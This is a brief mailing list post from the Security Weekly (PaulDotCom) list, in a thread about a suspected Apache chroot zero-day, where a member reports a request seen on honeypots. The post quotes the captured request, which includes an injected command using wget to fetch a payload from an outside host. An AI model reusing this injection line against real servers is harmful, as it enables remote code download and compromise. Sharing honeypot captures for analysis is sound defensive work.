PaulDotCom mailing list archives

Re: [Security Weekly] apache chroot 0day?

From: Lutz Schildt <ls () lsmooth de>
Date: Mon, 28 Jul 2014 21:26:35 +0200

I've seen the same request on one of my honeypots and a second one a few hours later from the same IP:


GET/?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget proxypipe.com/apach0day;
HTTP/1.0
User-agent: chroot-apach0day
Referrer: /xA/x0a/x06

_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

Current thread:

Re: [Security Weekly] apache chroot 0day?, (continued)
- - Re: [Security Weekly] apache chroot 0day? Robin Wood (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Jim Halfpenny (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Eric Buckingham (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Ken Pryor (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Oleg Laskin (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Eric Buckingham (Jul 29)
  - Re: [Security Weekly] apache chroot 0day? Xavier Mertens (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Robin Wood (Jul 28)
  - Re: [Security Weekly] apache chroot 0day? xgermx (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Ben Jackson (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Lutz Schildt (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Lutz Schildt (Jul 29)
    - Re: [Security Weekly] apache chroot 0day? Bruno Savioli (Jul 29)
    - Re: [Security Weekly] apache chroot 0day? Jim Halfpenny (Jul 29)
    - Re: [Security Weekly] apache chroot 0day? Robin Wood (Jul 29)